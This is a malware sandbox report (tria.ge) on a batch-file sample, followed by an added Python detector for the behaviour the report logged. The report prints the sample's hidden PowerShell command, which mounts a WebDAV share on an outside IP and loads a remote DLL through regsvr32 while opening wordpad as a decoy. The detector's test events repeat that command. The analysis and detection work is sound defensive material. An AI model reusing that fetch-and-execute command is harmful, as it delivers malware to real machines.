Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
  max time kernel: 122s
  max time network: 128s
  platform: windows7_x64
  resource: win7-20240704-en
  resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  submitted: 23/07/2024, 03:27
Static task
  static1

Behavioral task
  behavioral1
  Sample: 1209140631077924736.bat
  Resource: win7-20240704-en

Behavioral task
  behavioral2
  Sample: 1209140631077924736.bat
  Resource: win10v2004-20240709-en
General
  Target: 1209140631077924736.bat
  Size: 18KB
  MD5: f23dde61b4953152a0e7b7dd18d9a7e8
  SHA1: 85f34fc4fde85b43c59aaa0b3841aea605f8573b
  SHA256: ce8fa1b2db4640c2293cdd07d915ab60af865961c450a75a95eabca95187b8b8
  SHA512: be0de8e2db58a1e860ee99acd7a712dc598226544e6cf08a33bc7657afff88b4b5279b56681b27fe1d448114f0c34cec66d097875b8fa93dac75b577830835d3
  SSDEEP: 384:lT8bJlUeKsvI+8R7vedXYPIDb/fA9Lq+zCYGjfd5soyBSa:EKsvZ8llIffA9LP/yfd5soyIa
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run PowerShell and hide the display window.
  pid   process
  2620  powershell.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Runs net.exe

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   process
  2620  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  2620  powershell.exe

Suspicious use of SetWindowsHookEx (5 IoCs)
  pid   process      count
  2228  wordpad.exe  5

Suspicious use of WriteProcessMemory (14 IoCs)
  source pid  process         target pid  procid_target  writes
  2436        cmd.exe         2228        31             3
  2436        cmd.exe         2620        32             3
  2620        powershell.exe  2520        34             3
  2620        powershell.exe  2712        35             5
Processes

cmd.exe (PID 2436)
  C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\1209140631077924736.bat"
  - Suspicious use of WriteProcessMemory

  wordpad.exe (PID 2228), child of 2436
    C:\Program Files\Windows NT\Accessories\wordpad.exe
    "C:\Program Files\Windows NT\Accessories\wordpad.exe"
    - Suspicious use of SetWindowsHookEx

  powershell.exe (PID 2620), child of 2436
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\30557255532975.dll
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    net.exe (PID 2520), child of 2620
      C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\

    regsvr32.exe (PID 2712), child of 2620
      C:\Windows\system32\regsvr32.exe
      "C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\30557255532975.dll
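The process tree above shows the whole chain: a hidden PowerShell window runs `net use` against a WebDAV share (the `\\host@port\share` UNC form is handled by the Windows WebClient service over HTTP rather than SMB) and then hands a DLL from that share to `regsvr32 /s`, while wordpad.exe is opened as a decoy. The following detection logic is an added example and is not part of the Triage report or its tooling. It runs over constructed process-creation records whose PIDs, images and command lines are copied from the tree above; the record format, field names and the list of script hosts treated as suspicious parents are assumptions made for this example, not a Triage or Sysmon schema.

```python
"""Detection logic for a hidden-PowerShell -> net use (WebDAV) -> regsvr32 chain.

Added example: the ProcEvent layout and the rule names are assumptions for this
example, not Triage's schema. The sample events below are constructed from the
command lines shown in the report's process tree.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# WebDAV-over-HTTP UNC syntax understood by the Windows WebClient service:
#   \\host@port\share\...       HTTP on a non-default port (the form in this report)
#   \\host@SSL\share\...        HTTPS on 443
#   \\host@SSL@port\share\...   HTTPS on a non-default port
# A bare \\host\share is ordinary SMB and is deliberately not matched here.
WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[A-Za-z0-9.\-]+)(?P<suffix>(?:@SSL)?(?:@(?P<port>\d+))?)\\(?P<share>[^\\\s\"';]+)",
    re.IGNORECASE,
)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
ANY_UNC = re.compile(r"\\\\[A-Za-z0-9.\-@]+\\")
# Assumed list of script/LOLBin hosts that should not normally spawn regsvr32 on a remote DLL.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def webdav_target(cmdline: str) -> Optional[Tuple[str, str, str]]:
    """Return (host, port, share) for the first WebDAV-style UNC path in a command line."""
    m = WEBDAV_UNC.search(cmdline)
    if not m or not m.group("suffix"):
        return None                      # plain \\host\share: SMB, not WebDAV syntax
    ssl = "@ssl" in m.group("suffix").lower()
    port = m.group("port") or ("443" if ssl else "80")
    return (m.group("host"), port, m.group("share"))


def analyze(events: List[ProcEvent]) -> List[Finding]:
    """Apply the rules to a batch of process-creation events and return all hits."""
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in events:
        name = _basename(e.image)
        target = webdav_target(e.cmdline)
        if target:
            host, port, share = target
            findings.append(Finding(e.pid, "webdav_unc_path", f"{host}:{port}/{share}"))
        if name == "net.exe" and target and re.search(r"\buse\b", e.cmdline, re.IGNORECASE):
            findings.append(Finding(e.pid, "net_use_webdav", e.cmdline))
        if name == "regsvr32.exe" and ANY_UNC.search(e.cmdline):
            findings.append(Finding(e.pid, "regsvr32_remote_dll", e.cmdline))
            parent = by_pid.get(e.ppid)
            if parent and _basename(parent.image) in SCRIPT_HOSTS:
                findings.append(Finding(
                    e.pid, "script_host_to_regsvr32_remote",
                    f"{_basename(parent.image)}({parent.pid}) -> regsvr32.exe({e.pid})"))
        if name in ("powershell.exe", "pwsh.exe") and HIDDEN_WINDOW.search(e.cmdline):
            findings.append(Finding(e.pid, "hidden_powershell", e.cmdline))
    return findings


def extract_webdav_targets(events: List[ProcEvent]) -> Set[Tuple[str, str, str]]:
    """Distinct (host, port, share) tuples: the network IoCs to block or hunt for."""
    return {t for e in events if (t := webdav_target(e.cmdline))}


# Constructed from the report's process tree (PIDs, images and command lines as shown there).
EVENTS = [
    ProcEvent(2436, 1000, r"C:\Windows\system32\cmd.exe",
              r'cmd /c "C:\Users\Admin\AppData\Local\Temp\1209140631077924736.bat"'),
    ProcEvent(2228, 2436, r"C:\Program Files\Windows NT\Accessories\wordpad.exe",
              r'"C:\Program Files\Windows NT\Accessories\wordpad.exe"'),
    ProcEvent(2620, 2436, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; "
              r"regsvr32 /s \\45.9.74.36@8888\davwwwroot\30557255532975.dll"),
    ProcEvent(2520, 2620, r"C:\Windows\system32\net.exe",
              '"C:\\Windows\\system32\\net.exe" use \\\\45.9.74.36@8888\\davwwwroot\\'),
    ProcEvent(2712, 2620, r"C:\Windows\system32\regsvr32.exe",
              r'"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\30557255532975.dll'),
]

if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"[{f.rule}] pid={f.pid}: {f.detail}")
    print("WebDAV targets:", extract_webdav_targets(EVENTS))
```

The `webdav_unc_path` rule is the one that generalises best: it fires on the `@port` and `@SSL` forms regardless of which binary consumes the path, so it also catches variants that swap regsvr32 for rundll32 or a direct copy from the share. The wordpad.exe decoy produces no hit, and a `regsvr32 /s` on a local DLL is ignored, which keeps the rule quiet on legitimate COM registration.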